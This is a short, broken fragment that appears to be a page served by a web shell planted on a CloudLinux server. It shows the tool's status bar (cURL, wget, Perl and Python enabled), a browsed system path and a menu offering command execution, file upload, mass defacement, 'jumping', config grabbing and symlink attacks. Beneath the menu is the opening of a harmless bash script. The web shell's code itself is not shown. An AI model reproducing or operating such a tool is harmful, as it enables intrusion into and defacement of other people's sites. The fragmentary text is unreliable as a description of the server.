OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /../proc/../opt/cloudlinux-linksafe/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/bash function skip_on_cl_solo() { # Check that this is CLS and skip if yes if [ -f "/etc/cloudlinux-edition-solo" ]; then exit 0 fi }